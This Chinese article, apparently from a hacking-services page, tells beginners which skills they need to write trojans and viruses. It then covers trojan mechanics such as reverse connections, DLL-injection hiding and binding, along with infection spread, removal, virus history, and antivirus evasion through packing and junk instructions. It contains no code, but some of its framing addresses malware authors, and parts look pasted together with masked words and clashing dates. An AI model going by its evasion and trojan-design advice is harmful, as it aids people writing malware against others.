零基础怎么成为黑客(成为黑客的基础知识)

访客4年前关于黑客接单1063

  总体来说,要成为较为资深的黑客编程者,你需要掌握以下一些必不可少的编程技术知识:

  1,C、C++编程

  作为一个比较底层和功能强大的编程语言,黑客基本上是必备的。虽然也有一些玩黑的人删除用Delphi甚至是易语言等这种,单纯编写木马还可以,但不是主流,这类编程很多依赖于系统接口,而系统函数几乎都是用C/C++编写而成,很多数据结构,函数等与之自然结合,水到渠成。要想成为黑客编程高手,C/C++是不二选择,没有这块,后面说的东西就大打折扣了。

  2,深入的系统知识

  黑客编程需要用到非常多的系统功能,你对所使用的系统必须有较深入的了解,比如权限,程序运行级别,文本格式自动关联,线程进程相关知识,跨进程操作,内存管理。这些东西要是不调用系统API,基本不可能完成。另外像鼠标、键盘、文件读写等事件监控等等都少不了对系统的了解。对计算机本地的各种窃听、记录、自动启动、限制用户都意味着熟悉这些知识,这部分是木马作者必须要学习的。早期的黑客编程由于 *** 不发达,攻击很多来自于系统内部的缓冲区溢出攻击,这中攻击方式成了黑客的经典攻击,如果说你不了解和使用这种,就不要说自己玩黑客。但是要完全理解和正确应用是需要了解函数调用过程以及内存相关知识的系统知识。

  3,熟悉可执行文件格式

  如果要完成函数调用的截获,增加、减少第三方应用程序的功能,或者传播你自己的xx东西到其他进程,你需要对可执行文件比较了解,对执行文件的加载过程,动态库函数是如何注册到执行文件的流程有清楚认识。要完成典型感染其他程序,这个也是必不可少的,这部分和汇编知识是文件型病毒作者必不可少的学习内容。

  4,熟悉常见的汇编指令

  要完成一些高级功能,作为一个正牌的黑客编程者,汇编的知识也是必不可少。比如提取传说中的shellcode,从用户模式进入内核模式常常会用到。一些特殊功能不用汇编基本不可能完成,比如在你退出你自己的代码之后需要自己把代码所在的所有物理内存释放掉这样的特定需求。所以黑客程序,实际上有相当一部分是不按常规出牌的程序,这些特别的地方就是使用了汇编(机器码)直接完成一些高级语言所不能完成的功能,很多典型的计算机病毒都是直接用汇编写出来的。可见作为资深的黑客编码者,汇编确实非常重要。

  5, *** 编程技术

  说到黑客编程,估计大家都知道,要远程通信和控制, *** 技术是必备的,你不只是需要了解和学习基本的TCP/IP协议,还有上层的各种应用层协议。比如你听到过ICMP木马吧、你发送邮件需要知道 *** TP和POP3协议吧,你要下载和上次文件,需要知道FPT/TFTP、HTTP协议吧。在特定情况下,甚至还需要构造 *** 包,这些都要求你对 *** 相关知识和编程有了解。否则要写一个扫描器,漏洞检测工具是不可能完成的,尤其是现在 *** 这么发达,不像早期很多黑客程序通过直接接触媒介进行活动,基本都是 *** 连接。

  6,网页相关技术

  作为一个经典的黑客,修改网页貌似成了黑客的标记,这样装起逼来更十足^_^。所以你还的了解HTML、 *** P、ASP、PHP等这些网站前端编程语言以及用的很多的SQL等数据库,要不然怎么玩注入漏洞攻击呢?比起早期的栈溢出攻击,现在使用的更广泛,毕竟缓冲区溢出这个漏洞太经典,系统编写者首要就是防止这个漏洞出现,所以现在要发现和使用它已经太难了。

  7,会使用常见的相关工具

  上面说的貌似不多,其实要每一项都真正学习并掌握,是需要花很多时间,有相当难度的。所以更好的方式是需要掌握一些常用的工具来帮助你,而不是所以的都去学习,当然学习了更好。比如 *** 抓包、扫描联网主机、寻找 *** 服务器等等,就有很多常用的工具而不需要你自己去编写。对于大多数黑客程序编写者来说,往往重点在其中一项或者几项中熟悉,那么其他部分就使用现有的工具,比如系统漏洞扫描、网站注入漏洞扫描、弱口令检查等等,发现之后再编写对应的工具完成你的任务。

  以上主要列出黑客编写需要的一些技术,其实每一项都有很多要学习,要完全搞得很熟悉估计绝大多数都完不成,就看感兴趣的你想学哪些了。

  --THE END--

  更高境界,总结、归纳、创新这个数学上的不二法宝,这大概就是黑客的更高境界吧!

  成为黑客必须掌握的知识

  一、一定的英文水平

  大家都知道,计算机的起源来自于国外,多数的资料、编程语言、命令等都是以英文为基础的,所以一定的英文水品是必要的,当然了,这并不能阻挡我们中国人学习黑科技术的脚步,如果英文水平欠佳,找本字典,或者是翻译app就可以了。

  同时也能希望我国的科技发展能够更进一步,开发出汉字的编程语言,更加适合中国人,不过貌似比较遥远。

  二、掌握常用 *** 安全术语

  肉鸡、木马、病毒、后门(即:端口,漏洞)等等,这些就是常用的黑客术语了,学习黑客入门,这是必须要首先去了解的,如果这些都不知道,那么自然就看不懂技术教程了,还有如ARP、TCP/IP等等 *** 术语,了解了这些我们才能知道 *** 的基本架构,之后才可以深入去学习相关知识,当然了,我相信能有兴趣看这篇文章的你,大多还是基本了解这些的。

  ( 1 )所谓电脑肉鸡,就是拥有管理权限的远程电脑。也就是受别人控制的远程电脑。肉鸡可以是各种系统,如win,linux,unix等;更可以是一家公司\企业\学校甚至是 *** 军队的服务器,一般所说的肉鸡是一台开了3389端口的Win2K系统的服务器,所以3389端口没必要开时关上更好。

  ( 2 )计算机木马(又名间谍程序)是一种后门程序,常被黑客用作控制远程计算机的工具。英文单词“Troj”,直译为“特洛伊”。 "木马"程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不"刻意"地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种主机。木马病毒的产生严重危害着现代 *** 的安全运行。

  这个词语来源于古希腊神话,在计算机领域是一种客户/服务器程序(c/s)或邮件客户端程序(如阿里巴巴 *** 大盗),是黑客最常用的基于远程控制的工具。目前,比较有名的国产木马有:“熊猫烧香(武汉男孩)”“冰河”、“广外女生”、“黑洞”、“黑冰”等;国外有名的木马则有:“SubSeven”、“Bo2000(Back Orifice)”、“NetSpy”、“Asylum”等。木马对计算机系统和 *** 安全危害相当大,因此,如何防范木马入侵成为了计算机 *** 安全的重要内容之一

  木马原理

  一个完整的“木马”程序包含了两部分:“服务器”和“控制器”。植入你的电脑的是它的“服务器”部分,而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。

  众所周知,基于TCP/IP协议接入互联网的电脑有0到65535共256×256个端口。通常我们上网的时候,电脑通过139端口与外界保持联系。运行了木马程序的“服务器”以后,你的电脑就会有另一个或几个端口被打开,使黑客可以利用这些打开的端口进入你的系统,你的系统安全和个人隐私也就全无保障了!

  木马如此“泛滥”,究竟我们怎么样才能知道我们的电脑被种上了木马呢?计算机木马一般由两部分组成,服务端和控制端,也就是常用的C/S(Client/Server)模式。

  服务端(S端Server):远程计算机机运行。一旦执行成功就可以被控制或者造成其他的破坏,这就要看种木马的人怎么想和木马本身的功能,这些控制功能,主要采用调用Windows的API实现,在早期的dos操作系统,则依靠DOS终端和系统功能调用来实现(INT 21H),服务段设置哪些控制,视编程者的需要,各不相同。

  控制端(C端Client)也叫客户端,客户端程序主要是配套服务段端程序的功能,通过 *** 向服务端发布控制指令,控制段运行在本地计算机。

  “木马”是一种经过伪装的欺骗性程序,它通过将自身伪装吸引用户下载执行,从而破坏或窃取使用者的重要文件和资料。

  木马程序与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它的主要作用是向施种木马者打开被种者电脑的门户,使对方可以任意毁坏、窃取你的文件,甚至远程操控你的电脑。木马与计算机 *** 中常常要用到的远程控制软件是有区别的。虽然二者在主要功能上都可以实现远程控制,但由于远程控制软件是“善意”的控制,因此通常不具有隐蔽性。木马则完全相反,木马要达到的正是“偷窃”性的远程控制,因此如果没有很强的隐蔽性的话,那么木马简直就是“毫无价值”的。因此判别木马与远程控制的两个重要标准是其使用目的和隐蔽性。

  木马特殊类型

  普通木马的都是由C端发送请求S端来连接,但有些另类的木马就不是这样,它由S端向C端发送请求。这样做有什么好处呢?大家知道, *** 防火墙都有监控 *** 的作用,但它们大多都只监控由外面近来的数据,对由里向外数据的却不闻不问。反弹端口木马正好利用了这一点来躲开 *** 防火墙的阻挡,以使自己顺利完成任务。大名鼎鼎的“ *** 神偷”、“灰鸽子”就是这样一类木马。它由S端向C端发送一个连接请求,C端的数据在经过防火墙时,防火墙会以为是发出去的正常数据(一般向外发送的数据,防火墙都以为是正常的)的返回信息,于是不予拦截,这就给它了可钻的空子。

  “进程”是一个比较抽象的概念,可以理解为排队买电影票,每一个窗口(其实就是端口)排的人可以理解为一个进程,有多少窗口就有多少个进程。普通木马在运行时都有自己独立的进程(某一特定窗口排的人,先当作小偷),利用“柳叶擦眼”一类的优秀进程查看软件就可以发现和终止它。这岂不是太扫兴了?好不容易写出个木马就这么被你发现了。为了更好的隐藏自己,木马的 *** 者就想了一些办法,把木马的程隐藏进正常的进程(宿主进程)内。打个比方,正常的进程(系统和正当文件的进程)可以理解为正常排队买票的人。而木马的进程(排队假装买票的小偷),他们如果都排在某一个窗口(通过某一特定端口进行通讯),很容易就被发现了,于是那些小偷就想办法混到正常排队人当中(实现了木马进程的隐藏),这样就不容易被发现,而且也不容易被终止。在实际中,即使你发现了隐藏在某一正常进程中的木马进程,你也不敢轻易终止它,因为一旦终止了木马的进程,正常的宿主进程也就被终止,这可能导致一些严重的后果。所以可以看出,无进程木马实际上是“隐藏进程木马”,而这也是它的高明之处。在实际中不可能出现真正意义上的“无进程木马”。最近出现的“广外男生”就是典型的例子。

  在实现方面,Hook隐藏进程、有dll注入、dll调用等 *** 。这里要澄清,这里所说的"无进程"并非真的无进程,因为进程是软件调用的资源分配依据和最基本单位,没有进程就代表没有任何的计算机资源(CPU使用、内存使用、磁盘读写权利、 *** 端口)。无进程表示进程被隐藏或者利用现成的进程加入自己的线程从而实现的。

  这类木马最显著的特点是C端和S端是集成到一起的或者只是一个自行获取信息的邮件客户端,一次配置好就不能再更改。功能一般比较专一,针对性强。经常用来偷取 *** 、Email和 *** 游戏的密码等。

  先用自己写的小程序或者利用系统的漏洞(BUG),夺取到某写特定的权限,比如上传文件,干掉 *** 防火墙和病毒防火墙等,然后上传修改过或没修改过的功能强大的木马,进一步夺取控制权。于是这个小程序或者系统漏洞就和那个功能强大的真正的木马联合起来,组成了一款“嵌套型木马”,其特点是不容发现和查杀,“具有良好的发展前景”。如“下载者”。

  严格意义上讲,这里所说的其他木马并不是真正的木马,它们只能算做是木马入侵时的辅助工具吧。典型的有恶意网页代码,让你浏览后不知不觉就被完全共享了所有的硬盘,然后方便别人给你种下木马,为进一步入侵做好准备。

  木马捆绑

  木马捆绑,通俗地讲就是把木马的代码嵌入其他类型的文件,便于伪装,比如,大名鼎鼎的国产木马“冰河”,他就自带一个捆绑工具,可以把木马代码嵌入到网页文件、图片文件、可执行文件等多种支持脚本语言或运行代码的文件中。当接受方收到这些文件时,几乎感觉不到有任何异样,但在后台,木马代码却悄然进入内存并运行。

  如果你的电脑莫名其妙地死机或重启,如果硬盘在无操作的情况下频繁被访问,如果系统无端搜索软驱、光驱,如果系统速度异常缓慢,系统资源占用率过高...你是否已经意识到你的电脑可能被植入了木马程序?

  “特洛伊木马”,不是历史上那场惊心动魄的战争,而是互联网上广为祸患的一种危险程序。木马在今天的 *** 上可谓无所不在,像“BO Back Orifice ”、“冰河”都是一种木马程序甚至,连掌上电脑(PDA)的世界也已经出现了“木马”程序(Liberty Crack)。人们谈“马”色变,下面,我就给大家说说可怕的“特洛伊木马”到底是怎么回事。

  传播途径

  编辑

  木马的传播途径很多,常见的有如下几类:

  通过电子邮件的附件传播

  这是最常见,也是最有效的一种方式,大部分病毒(特别是蠕虫病毒)都用此方式传播。首先,木马传播者对木马进行伪装, *** 很多,如变形、压缩、加壳、捆绑、取双后缀名等,使其具有很大的迷惑性。一般的做法是先在本地机器将木马伪装,再使用杀毒程序将伪装后的木马查杀测试,如果不能被查到就说明伪装成功。然后利用一些捆绑软件把伪装后的木马藏到一幅图片内或者其他可运行脚本语言的文件内,发送出去。

  通过下载文件传播

  从网上下载的文件,即使大的门户网站也不能保证任何时候他的问件都安全,一些个人主页、小网站等就更不用说了。下载文件传播方式一般有两种,一种是直接把下载链接指向木马程序,也就是说你下载的并不是你需要的文件。另一种是采用捆绑方式,将木马捆绑到你需要下载的文件中。

  通过网页传播

  大家都知道很多VBS脚本病毒(著名的vbs病毒是暴风一号)就是通过网页传播的,木马也不例外。网页内如果包含了某些恶意代码,使得IE自动下载并执行某一木马程序。这样你在不知不觉中就被人种上了木马。顺便说一句,很多人在访问网页后IE设置被修改甚至被锁定,也是网页上用脚本语言编写的的恶意代码作怪。

  通过聊天工具传播

  目前, *** 、ICQ、MSN、等 *** 聊天工具盛行,而这些工具都具备文件传输功能,不怀好意者很容易利用对方的信任传播木马和病毒文件。

  木马运行“征兆”

  编辑

  如果电脑莫名其妙地死机或重启;

  如果硬盘在无操作的情况下频繁被访问;

  如果系统无端搜索软驱、光驱;

  如果系统速度异常缓慢,系统资源占用率过高……

  这些时候,你要小心了!你很可能已经和“木马”发生了“亲密接触”!到底这些“ *** ”是如何在我们电脑里“安家落户”的呢?

  隐藏启动

  编辑

  木马进入服务端计算机以后,需要经过某种方式激活自身,运行并加载到系统自启动程序序列。了解木马怎样激活自身,是找到并且清除木马的关键所在

  检查 ***

  编辑

  一、自动查杀:利用各种杀毒软件进行杀毒。一般的杀毒软件都具备查杀木马的功能。现在在线查杀大多都不需收费,也有很多免费的杀毒软件供大家使用,并不需要像90年代那样因为杀毒软件费用而被迫手动查杀。

  二、手动查杀:

  1、自动运行检查:一般的木马为了能够更大限度获取你的权利,都会设置自动运行(autorun),常见的自动运行有:注册表关键值(请参考参考资料)。Autorun.inf(媒体自动播放,U盘病毒常用)脚本,内核加载(Linux病毒手法)等。

  2、端口检查:你可以使用专业的端口检查工具(如个人防火墙自带的工具)也可以使用系统自带的工具。(1)在在Windows 2000/XP/Server 2003中要查看端口,可以使用Netstat命令:依次点击“开始→运行”,键入“cmd”并回车,打开命令提示符窗口。在命令提示符状态下键入“netstat -a -n”,按下回车键后就可以看到以数字形式显示的TCP和UDP连接的端口号及状态。

  (2)在linux下可以使用netstate命令:

  打开终端,输入netstat -anp 按回车后即可端口占用状态。

  手工删除

  编辑

  如果你认为找到木马后,删除不过是举手之劳,那你就大错特错了。删除木马,有时候恰恰是最困难的工作,如果删除不彻底,木马很容易“死灰复燃”。首先想到的 *** 应该是使用杀毒软件, 毕竟优秀的杀毒软件都是千锤百炼出来的“反恐”高手。那么手工删除要注意什么呢

  许多木马本身具有自动检测其自启动项目的功能,如果你在未删除木马的情况下先行删除了其启动项目,木马马上又能将这些启动信息重新写入相关的文件或注册表相关位置。因此,最稳妥的 *** 是,在确定木马的位置以后,先重新启动计算机并进入DOS状态,在DOS下删掉木马程序后,再返回Windows,删除它的相关启动信息。

  其次是木马文件名的麻烦——木马为了更好地隐藏自己和给你制造麻烦,生成的服务端文件名类似Windows的系统文件名。比如木马SubSeven 1.7版本的服务器文件名是c:\windows\kernel16.dll,而Windows有一个系统文件是c:\windows\kernel32.dll。又如,木马phAse 1.0版本,生成的木马是c:\windows\system\Msgsrv32.exe,和Windows的系统文件一模一样,只是图标不同,你能正确区分这些并且删除吗?另外,别忘了,文件名是可以改的。你可能认为中了netbus木马就该有Mring.exe或者SysEdit.exe这样的文件出现,但是我把它改成123.exe你又能如何呢?所以,千万别一味依赖“常识”。

  最后也是最困难的,就是木马的“多重攻击”带来的麻烦。比如一种名叫“聪明基因”的国产“文件关联”型木马,只要服务端被运行,就会生成c:\windows\MBBManager.exe和Explore32.exe以及c:\windows\system\editor.exe三个文件,它们用的都是HTM文件图标,如果你的系统设置是不显示已知文件类型的扩展名,还真会以为它们是HTM文件呢!Explore32.exe关联HLP文件,MBBManager.exe在启动时加载,Editor.exe关联TXT文件。当你发现并删除了MBBManager.exe,以为大功告成的时候,只要打开HLP文件或文本文件,哪怕只是一次,Explore32.exe和Editor.exe就被激活并再次生成MBBManager.exe。类似手段甚至更厉害的木马还有很多。要手工清除木马,非得有充分的电脑知识,丰富的经验,冷静的头脑,敏锐的洞察力以及高度的警惕性和超强的分析能力才行——你做得到吗?防患于未然木马如此凶残,你还有信心战胜它吗?别急,其实对付木马的更好 *** ,就是将它“拒之门外”。在这个木马横行的年代,我们实在有必要加强安全防护意识。防火墙、杀毒软件都要经常更新;要慎重选择下载软件的地方,尽量不要到一些来历不明的个人主页下载软件;对下载的软件,务必先用杀毒软件扫描后才可以进行安装,以防其中包藏祸害;另外就是不要打开来历不明邮件中的附件,不要执行别人发给你的所谓“有趣”的小程序……

  此外,一旦中了木马,首先要断开 *** 连接,因为这样就是神仙也操纵不了你了,然后你可以耐心地去清除它。还有就是删除前做好备份,以防操作失误。

  总之, *** 也是一个复杂的社会。并且不同于现实社会的是,在这个虚拟世界里我们并不能见到对方的真实面目。所以,我们更是难辨真伪。在这样的环境中生存,我们一定要处处严加防范!这样,才能保证我们的安全

  ( 3 )计算机病毒

  计算机病毒(Computer Virus)是编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。计算机病毒具有传播性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性。计算机病毒的生命周期:开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。计算机病毒是一个程序,一段可执行码。就像生物病毒一样,具有自我繁殖、互相传染以及激活再生等生物病毒特征。计算机病毒有独特的复制能力,它们能够快速蔓延,又常常难以根除。它们能把自身附着在各种类型的文件上,当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。

  

  计算机病毒(Computer Virus)在《中华人民共和国计算机信息系统安全保护条例》中被明确定义,病毒指“编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码”。

  计算机病毒与医学上的“病毒”不同,计算机病毒不是天然存在的,是人利用计算机软件和硬件所固有的脆弱性编制的一组指令集或程序代码。它能潜伏在计算机的存储介质(或程序)里,条件满足时即被激活,通过修改其他程序的 *** 将自己的精确拷贝或者可能演化的形式放入其他程序中。从而感染其他程序,对计算机资源进行破坏,所谓的病毒就是人为造成的,对其他用户的危害性很大。

  之一份关于计算机病毒理论的学术工作( "病毒" 一词当时并未使用)于 1949 年由约翰·冯·诺伊曼完成。以 "Theory and Organization of Complicated Automata" 为题的一场在伊利诺伊大学的演讲,后改以 "Theory of self-reproducing automata" 为题出版。冯·诺伊曼在他的论文中描述一个计算机程序如何复制其自身。

  1980 年,Jürgen Kraus 于多特蒙德大学撰写他的学位论文 "Self-reproduction of programs"。论文中假设计算机程序可以表现出如同病毒般的行为。

  “病毒”一词最早用来表达此意是在弗雷德·科恩(Fred Cohen)1984年的论文《电脑病毒实验》

  1983 年 11月,在一次国际计算机安全学术会议上,美国学者科恩之一次明确提出计算机病毒的概念,并进行了演示。

  1986年年初,巴基斯坦兄弟编写了“大脑(Brain)”病毒,又被称为“巴基斯坦”病毒。

  1987年,之一个电脑病毒C-BRAIN诞生。由巴基斯坦兄弟:巴斯特(Basit)和阿姆捷特(Amjad)编写。计算机病毒主要是引导型病毒,具有代表性的是“小球”和“石头”病毒。

  1988年在财政部的计算机上发现的,中国最早的计算机病毒。

  1989年,引导型病毒发展为可以感染硬盘,典型的代表有“石头2”。

  1990年,发展为复合型病毒,可感染COM和EXE文件。

  1992年,利用DOS加载文件的优先顺序进行工作,具有代表性的是“金蝉”病毒。

  1995年,当生成器的生成结果为病毒时,就产生了这种复杂的“病毒生成器” ,幽灵病毒流行中国。 [8] 典型病毒代表是“病毒制造机” “VCL”。

  1998年台湾大同工学院学生陈盈豪编制了CIH病毒。

  2000年更具破坏力的10种病毒分别是:Kakworm,爱虫, Apology-B, Marker , Pretty ,Stages-A,Navidad,Ska-Happy99 ,WM97/Thus ,XM97/Jin。

  2003年,中国大陆地区发作最多的十个病毒,分别是:红色结束符、爱情后门、FUNLOVE、 *** 传送者、冲击波杀手、罗拉、求职信、尼姆达II、 *** 木马、CIH。

  2005年,1月到10月,金山反病毒监测中心共截获或监测到的病毒达到50179个,其中木马、蠕虫、黑客病毒占其中的91%,以盗取用户有价账号的木马病毒(如网银、 *** 、网游)为主,病毒多达2000多种。

  2007年1月,病毒累计感染了中国80%的用户,其中78%以上的病毒为木马、后门病毒。 [12] 熊猫烧香肆虐全球。

  2010年,越南全国计算机数量已500万台,其中93%受过病毒感染,感染电脑病毒共损失59000万亿越南盾。

  2017年5月,一种名为“想哭”的勒索病毒席卷全球,在短短一周时间里,上百个国家和地区受到影响。据美国有线新闻网报道,截至2017年5月15日,大约有150个国家受到影响,至少30万台电脑被病毒感染。

  1960年代初,美国麻省理工学院的一些青年研究人员,在做完工作后,利用业务时间玩一种他们自己创造的计算机游戏。做法是某个人编制一段小程序,然后输入到计算机中运行,并销毁对方的游戏程序。而这也可能就是计算机病毒的雏形。

  繁殖性:计算机病毒可以像生物病毒一样进行繁殖,当正常程序运行时,它也进行运行自身复制,是否具有繁殖、感染的特征是判断某段程序为计算机病毒的首要条件。

  破坏性:计算机中毒后,可能会导致正常的程序无法运行,把计算机内的文件删除或受到不同程度的损坏。破坏引导扇区及BIOS,硬件环境破坏。

  传染性:计算机病毒传染性是指计算机病毒通过修改别的程序将自身的复制品或其变体传染到其它无毒的对象上,这些对象可以是一个程序也可以是系统中的某一个部件。

  潜伏性:计算机病毒潜伏性是指计算机病毒可以依附于其它媒体寄生的能力,侵入后的病毒潜伏到条件成熟才发作, 会使电脑变慢。

  隐蔽性:计算机病毒具有很强的隐蔽性,可以通过病毒软件检查出来少数,隐蔽性计算机病毒时隐时现、变化无常,这类病毒处理起来非常困难。

  可触发性:编制计算机病毒的人,一般都为病毒程序设定了一些触发条件,例如,系统时钟的某个时间或日期、系统运行了某些程序等。一旦条件满足,计算机病毒就会“发作”,使系统遭到破坏。

  病毒依附存储介质软盘、 硬盘等构成传染源。病毒传染的媒介由工作的环境来定。病毒激活是将病毒放在内存, 并设置触发条件,触发的条件是多样化的, 可以是时钟,系统的日期,用户标识符,也可以是系统一次通信等。条件成熟病毒就开始自我复制到传染对象中,进行各种破坏活动等。

  病毒的传染是病毒性能的一个重要标志。在传染环节中,病毒复制一个自身副本到传染对象中去

  感染策略

  为了能够复制其自身,病毒必须能够运行代码并能够对内存运行写操作。基于这个原因,许多病毒都是将自己附着在合法的可执行文件上。如果用户企图运行该可执行文件,那么病毒就有机会运行。病毒可以根据运行时所表现出来的行为分成两类。非常驻型病毒会立即查找其它宿主并伺机加以感染,之后再将控制权交给被感染的应用程序。常驻型病毒被运行时并不会查找其它宿主。相反的,一个常驻型病毒会将自己加载内存并将控制权交给宿主。该病毒于背景中运行并伺机感染其它目标。

  非常驻型病毒可以被想成具有搜索模块和复制模块的程序。搜索模块负责查找可被感染的文件,一旦搜索到该文件,搜索模块就会启动复制模块进行感染。

  常驻型病毒包含复制模块,其角色类似于非常驻型病毒中的复制模块。复制模块在常驻型病毒中不会被搜索模块调用。病毒在被运行时会将复制模块加载内存,并确保当操作系统运行特定动作时,该复制模块会被调用。例如,复制模块会在操作系统运行其它文件时被调用。在这个例子中,所有可以被运行的文件均会被感染。常驻型病毒有时会被区分成快速感染者和慢速感染者。快速感染者会试图感染尽可能多的文件。例如,一个快速感染者可以感染所有被访问到的文件。这会对杀毒软件造成特别的问题。当运行全系统防护时,杀毒软件需要扫描所有可能会被感染的文件。如果杀毒软件没有察觉到内存中有快速感染者,快速感染者可以借此搭便车,利用杀毒软件扫描文件的同时进行感染。快速感染者依赖其快速感染的能力。但这同时会使得快速感染者容易被侦测到,这是因为其行为会使得系统性能降低,进而增加被杀毒软件侦测到的风险。相反的,慢速感染者被设计成偶而才对目标进行感染,如此一来就可避免被侦测到的机会。例如,有些慢速感染者只有在其它文件被拷贝时才会进行感染。但是慢速感染者此种试图避免被侦测到的作法似乎并不成功

  病毒分类

  破坏性

  良性病毒、恶性病毒、极恶性病毒、灾难性病毒。

  传染方式

  引导区型病毒主要通过软盘在操作系统中传播,感染引导区,蔓延到硬盘,并能感染到硬盘中的"主引导记录"。

  文件型病毒是文件感染者,也称为“寄生病毒”。它运行在计算机存储器中,通常感染扩展名为COM、EXE、SYS等类型的文件。

  混合型病毒具有引导区型病毒和文件型病毒两者的特点。

  宏病毒是指用BASIC语言编写的病毒程序寄存在Office文档上的宏代码。宏病毒影响对文档的各种操作。

  连接方式

  源码型病毒攻击高级语言编写的源程序,在源程序编译之前插入其中,并随源程序一起编译、连接成可执行文件。源码型病毒较为少见,亦难以编写。

  入侵型病毒可用自身代替正常程序中的部分模块或堆栈区。因此这类病毒只攻击某些特定程序,针对性强。一般情况下也难以被发现,清除起来也较困难。

  操作系统型病毒可用其自身部分加入或替代操作系统的部分功能。因其直接感染操作系统,这类病毒的危害性也较大。

  外壳型病毒通常将自身附在正常程序的开头或结尾,相当于给正常程序加了个外壳。大部份的文件型病毒都属于这一类。 [26]

  计算机病毒种类繁多而且复杂,按照不同的方式以及计算机病毒的特点及特性,可以有多种不同的分类 *** 。同时,根据不同的分类 *** ,同一种计算机病毒也可以属于不同的计算机病毒种类。

  按照计算机病毒属性的 *** 进行分类,计算机病毒可以根据下面的属性进行分类。

  根据病毒存在的媒体划分:

   *** 病毒——通过计算机 *** 传播感染 *** 中的可执行文件。

  文件病毒——感染计算机中的文件(如:COM,EXE,DOC等)。

  引导型病毒——感染启动扇区(Boot)和硬盘的系统引导扇区(MBR)。

  还有这三种情况的混合型,例如:多型病毒(文件和引导型)感染文件和引导扇区两种目标,这样的病毒通常都具有复杂的算法,它们使用非常规的办法侵入系统,同时使用了加密和变形算法。

  根据病毒传染渠道划分:

  驻留型病毒——这种病毒感染计算机后,把自身的内存驻留部分放在内存(RAM)中,这一部分程序挂接系统调用并合并到操作系统中去,它处于激活状态,一直到关机或重新启动

  非驻留型病毒——这种病毒在得到机会激活时并不感染计算机内存,一些病毒在内存中留有小部分,但是并不通过这一部分进行传染,这类病毒也被划分为非驻留型病毒。

  根据破坏能力划分:

  无害型——除了传染时减少磁盘的可用空间外,对系统没有其它影响。

  无危险型——这类病毒仅仅是减少内存、显示图像、发出声音及同类影响。

  危险型——这类病毒在计算机系统操作中造成严重的错误。

  非常危险型——这类病毒删除程序、破坏数据、清除系统内存区和操作系统中重要的信息。

  根据算法划分:

  伴随型病毒——这类病毒并不改变文件本身,它们根据算法产生EXE文件的伴随体,具有同样的名字和不同的扩展名(COM),例如:XCOPY.EXE的伴随体是XCOPY-COM。病毒把自身写入COM文件并不改变EXE文件,当DOS加载文件时,伴随体优先被执行到,再由伴随体加载执行原来的EXE文件。

  “蠕虫”型病毒——通过计算机 *** 传播,不改变文件和资料信息,利用 *** 从一台机器的内存传播到其它机器的内存,计算机将自身的病毒通过 *** 发送。有时它们在系统存在,一般除了内存不占用其它资源。

  寄生型病毒——除了伴随和“蠕虫”型,其它病毒均可称为寄生型病毒,它们依附在系统的引导扇区或文件中,通过系统的功能进行传播,按其算法不同还可细分为以下几类。

  练习型病毒,病毒自身包含错误,不能进行很好的传播,例如一些病毒在调试阶段。

  诡秘型病毒,它们一般不直接修改DOS中断和扇区数据,而是通过设备技术和文件缓冲区等对DOS内部进行修改,不易看到资源,使用比较高级的技术。利用DOS空闲的数据区进行工作。

  变型病毒(又称幽灵病毒),这一类病毒使用一个复杂的算法,使自己每传播一份都具有不同的内容和长度。它们一般的作法是一段混有无关指令的解码算法和被变化过的病毒体组成。

  命名

  计算机病毒命名,DOS系统下病毒无前缀。(一般病毒命名格式:..)

  前缀

  含义

  WM

  Word6.0、Word95宏病毒

  WM97

  Word97宏病毒

  XM

  Excel5.0、Excel95宏病毒

  X97M

  Excel5.0和Excel97版本下发作

  XF

  Excel程序病毒

  AM

  Access95宏病毒

  AM97M

  Access97宏病毒

  W95

  Windows95、98病毒

  Win

  Windows3.x病毒

  W32

  32位病毒,感染所有32位Windows系统

  WINT

  32位Windows病毒,只感染Windows NT

  Trojan/Troj

  特洛伊木马

  VBS

  VBScript程序语言编写的病毒

  V ***

  Visio VBA宏或script的宏或script病毒

   ***

   *** cript编程语言编写的病毒

  PE

  32位寻址的Windows病毒

  OSX

  OS X的病毒

  OSXL

  OS X Lion或者更新版本的病毒

  征兆预防

  屏幕上出现不应有的特殊字符或图像、字符无规则变或脱落、静止、滚动、雪花、跳动、小球亮点、莫名其妙的信息提等。

  发出尖叫、蜂鸣音或非正常奏乐等。

  经常无故死机,随机地发生重新启动或无法正常启动、运行速度明显下降、内存空间变小、磁盘驱动器以及其他设备无缘无故变成无效设备等现象

  磁盘标号被自动改写、出现异常文件、出现固定的坏扇区、可用磁盘空间变小、文件无故变大、失踪或被改乱、可执行文件(exe)变得无法运行等

  打印异常、打印速度明显降低、不能打印、不能打印汉字与图形等或打印时出现乱码。

  收到来历不明的电子邮件、自动链接到陌生的网站、自动发送电子邮件等

  程序或数据神秘地消失了,文件名不能辨认等;注意对系统文件、可执行文件和数据写保护;不使用来历不明的程序或数据;尽量不用软盘进行系统引导。

  不轻易打开来历不明的电子邮件;使用新的计算机系统或软件时,先杀毒后使用;备份系统和参数,建立系统的应急计划等。安装杀毒软件。分类管理数据。

  免杀技术以及新特征

  免杀是指:对病毒的处理,使之躲过杀毒软件查杀的一种技术。通常病毒刚从病毒作者手中传播出去前,本身就是免杀的,甚至可以说“病毒比杀毒软件还新,所以杀毒软件根本无法识别它是病毒”,但由于传播后部分用户中毒向杀毒软件公司举报的原因,就会引起安全公司的注意并将之特征码收录到自己的病毒库当中,病毒就会被杀毒软件所识别。 [31]

  病毒作者可以通过对病毒进行再次保护如使用汇编加花指令或者给文档加壳就可以轻易躲过杀毒软件的病毒特征码库而免于被杀毒软件查杀。

  美国的Norton Antivirus、McAfee、PC-cillin,俄罗斯的Kaspersky Anti-Virus,斯洛伐克的NOD32等产品在国际上口碑较好,但杀毒、查壳能力都有限,目前病毒库总数量也都仅在数十万个左右。

